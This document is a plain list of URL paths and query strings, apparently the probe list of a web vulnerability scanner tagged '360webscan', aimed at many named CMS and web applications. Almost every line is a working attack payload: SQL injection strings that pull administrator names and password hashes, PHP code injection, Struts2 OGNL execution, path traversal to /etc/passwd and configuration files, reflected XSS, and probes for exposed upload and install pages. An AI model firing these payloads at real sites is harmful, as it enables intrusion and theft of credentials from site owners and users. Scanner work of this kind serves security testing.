/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
http://ec2-72-44-41-82.compute-1.amazonaws.com/proxyres.php
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
